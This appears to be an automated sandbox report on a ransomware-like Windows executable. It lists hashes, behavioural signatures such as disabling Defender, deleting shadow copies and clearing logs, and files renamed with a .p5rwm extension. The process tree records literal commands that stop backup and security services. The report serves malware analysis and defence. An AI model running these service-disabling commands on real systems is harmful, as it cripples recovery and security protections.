Analysis
max time kernel: 40s
max time network: 169s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 16:30
Static task: static1
Behavioral task: behavioral1
  Sample: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
  Resource: win10-en-20211208
General
Target: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Size: 4.2MB
MD5: 8c005827cf6f2d6b66d3fe8048387dde
SHA1: bfdea3bac03c5e5b1748447232db46cfa964a300
SHA256: 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372
SHA512: 2dde409e3048fe4f9a9bca1cc3a07546dc2958e7aefc29e3fe45094bbb5510ba28797a301781eb7559fd361463b004085b7cb758c9e420599504b7e54c620fa7
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
Processes (pid | process):
  1116 | MpCmdRun.exe
Modifies security service (2 TTPs, 1 IoC)
Processes (description | ioc | process):
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Clears Windows event logs (1 TTP)
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes (pid | process):
  720 | bcdedit.exe
  2200 | bcdedit.exe
Drops file in Program Files directory (64 IoCs)
Processes (description | ioc); the process column is 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe for every entry:
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JAAAACQAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DAAAAAwAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_MAAAADAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_KgAAACoAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_HAAAABwAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui
  File opened for modification | C:\Program Files\Internet Explorer\SIGNUP\install.ins.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm
  File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EAAAABAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_LAAAACwAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BgAAAAYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_PgAAAD4AAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NAAAADQAAAA0.p5rwm
  File opened for modification | C:\Program Files\7-Zip\Lang\kab.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-io.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui
  File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm
  File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm
  File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid | process):
  3788 | vssadmin.exe
Modifies registry class (3 IoCs)
Processes (description | ioc | process):
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | reg.exe
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | reg.exe
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes (pid | process):
  1780 | powershell.exe
  1780 | powershell.exe
  1780 | powershell.exe
  700 | powershell.exe
  700 | powershell.exe
  700 | powershell.exe
  3112 | 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
  3112 | 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (description | pid | process):
  Token: SeSecurityPrivilege | 3064 | wevtutil.exe
  Token: SeBackupPrivilege | 3064 | wevtutil.exe
  Token: SeSecurityPrivilege | 1960 | wevtutil.exe
  Token: SeBackupPrivilege | 1960 | wevtutil.exe
  Token: SeSecurityPrivilege | 4028 | wevtutil.exe
  Token: SeBackupPrivilege | 4028 | wevtutil.exe
  Token: SeIncreaseQuotaPrivilege | 4064 | wmic.exe
  Token: SeSecurityPrivilege | 4064 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 4064 | wmic.exe
  Token: SeLoadDriverPrivilege | 4064 | wmic.exe
  Token: SeSystemProfilePrivilege | 4064 | wmic.exe
  Token: SeSystemtimePrivilege | 4064 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 4064 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 4064 | wmic.exe
  Token: SeCreatePagefilePrivilege | 4064 | wmic.exe
  Token: SeBackupPrivilege | 4064 | wmic.exe
  Token: SeRestorePrivilege | 4064 | wmic.exe
  Token: SeShutdownPrivilege | 4064 | wmic.exe
  Token: SeDebugPrivilege | 4064 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 4064 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 4064 | wmic.exe
  Token: SeUndockPrivilege | 4064 | wmic.exe
  Token: SeManageVolumePrivilege | 4064 | wmic.exe
  Token: 33 | 4064 | wmic.exe
  Token: 34 | 4064 | wmic.exe
  Token: 35 | 4064 | wmic.exe
  Token: 36 | 4064 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 1228 | wmic.exe
  Token: SeSecurityPrivilege | 1228 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1228 | wmic.exe
  Token: SeLoadDriverPrivilege | 1228 | wmic.exe
  Token: SeSystemProfilePrivilege | 1228 | wmic.exe
  Token: SeSystemtimePrivilege | 1228 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1228 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1228 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1228 | wmic.exe
  Token: SeBackupPrivilege | 1228 | wmic.exe
  Token: SeRestorePrivilege | 1228 | wmic.exe
  Token: SeShutdownPrivilege | 1228 | wmic.exe
  Token: SeDebugPrivilege | 1228 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1228 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1228 | wmic.exe
  Token: SeUndockPrivilege | 1228 | wmic.exe
  Token: SeManageVolumePrivilege | 1228 | wmic.exe
  Token: 33 | 1228 | wmic.exe
  Token: 34 | 1228 | wmic.exe
  Token: 35 | 1228 | wmic.exe
  Token: 36 | 1228 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 1228 | wmic.exe
  Token: SeSecurityPrivilege | 1228 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 1228 | wmic.exe
  Token: SeLoadDriverPrivilege | 1228 | wmic.exe
  Token: SeSystemProfilePrivilege | 1228 | wmic.exe
  Token: SeSystemtimePrivilege | 1228 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 1228 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 1228 | wmic.exe
  Token: SeCreatePagefilePrivilege | 1228 | wmic.exe
  Token: SeBackupPrivilege | 1228 | wmic.exe
  Token: SeRestorePrivilege | 1228 | wmic.exe
  Token: SeShutdownPrivilege | 1228 | wmic.exe
  Token: SeDebugPrivilege | 1228 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 1228 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 1228 | wmic.exe
  Token: SeUndockPrivilege | 1228 | wmic.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description | pid | process | target process); "sample.exe" below stands for 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe:
  PID 3112 wrote to memory of 1344 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 1344 | 3112 | sample.exe | net.exe
  PID 1344 wrote to memory of 3032 | 1344 | net.exe | net1.exe
  PID 1344 wrote to memory of 3032 | 1344 | net.exe | net1.exe
  PID 3112 wrote to memory of 424 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 424 | 3112 | sample.exe | net.exe
  PID 424 wrote to memory of 1524 | 424 | net.exe | net1.exe
  PID 424 wrote to memory of 1524 | 424 | net.exe | net1.exe
  PID 3112 wrote to memory of 2196 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 2196 | 3112 | sample.exe | net.exe
  PID 2196 wrote to memory of 3572 | 2196 | net.exe | net1.exe
  PID 2196 wrote to memory of 3572 | 2196 | net.exe | net1.exe
  PID 3112 wrote to memory of 3052 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 3052 | 3112 | sample.exe | net.exe
  PID 3052 wrote to memory of 4064 | 3052 | net.exe | net1.exe
  PID 3052 wrote to memory of 4064 | 3052 | net.exe | net1.exe
  PID 3112 wrote to memory of 3048 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 3048 | 3112 | sample.exe | net.exe
  PID 3048 wrote to memory of 1008 | 3048 | net.exe | net1.exe
  PID 3048 wrote to memory of 1008 | 3048 | net.exe | net1.exe
  PID 3112 wrote to memory of 3240 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 3240 | 3112 | sample.exe | net.exe
  PID 3240 wrote to memory of 2748 | 3240 | net.exe | net1.exe
  PID 3240 wrote to memory of 2748 | 3240 | net.exe | net1.exe
  PID 3112 wrote to memory of 1308 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 1308 | 3112 | sample.exe | net.exe
  PID 1308 wrote to memory of 1160 | 1308 | net.exe | net1.exe
  PID 1308 wrote to memory of 1160 | 1308 | net.exe | net1.exe
  PID 3112 wrote to memory of 716 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 716 | 3112 | sample.exe | net.exe
  PID 716 wrote to memory of 720 | 716 | net.exe | net1.exe
  PID 716 wrote to memory of 720 | 716 | net.exe | net1.exe
  PID 3112 wrote to memory of 1788 | 3112 | sample.exe | net.exe
  PID 3112 wrote to memory of 1788 | 3112 | sample.exe | net.exe
  PID 1788 wrote to memory of 2200 | 1788 | net.exe | net1.exe
  PID 1788 wrote to memory of 2200 | 1788 | net.exe | net1.exe
  PID 3112 wrote to memory of 596 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 596 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 964 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 964 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1156 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1156 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1468 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1468 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 2388 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 2388 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1968 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1968 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1944 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1944 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 2440 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 2440 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1868 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 1868 | 3112 | sample.exe | sc.exe
  PID 3112 wrote to memory of 2404 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 2404 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3656 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3656 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 1052 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 1052 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3368 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3368 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3152 | 3112 | sample.exe | reg.exe
  PID 3112 wrote to memory of 3152 | 3112 | sample.exe | reg.exe
Processes (process tree; each entry is "image path | cmd: command line | PID", indented by nesting level, with the signatures that fired for that process listed beneath it)

C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe | cmd: "C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe" | PID:3112
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "SamSs" /y | PID:1344
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "SamSs" /y | PID:3032
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "SDRSVC" /y | PID:424
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "SDRSVC" /y | PID:1524
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "SstpSvc" /y | PID:2196
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "SstpSvc" /y | PID:3572
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "UI0Detect" /y | PID:3052
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "UI0Detect" /y | PID:4064
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "vmicvss" /y | PID:3048
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "vmicvss" /y | PID:1008
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "VSS" /y | PID:3240
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "VSS" /y | PID:2748
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "wbengine" /y | PID:1308
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "wbengine" /y | PID:1160
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "WebClient" /y | PID:716
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "WebClient" /y | PID:720
  C:\Windows\SYSTEM32\net.exe | cmd: net.exe stop "UnistoreSvc_12a0b" /y | PID:1788
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12a0b" /y | PID:2200
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "SamSs" start= disabled | PID:596
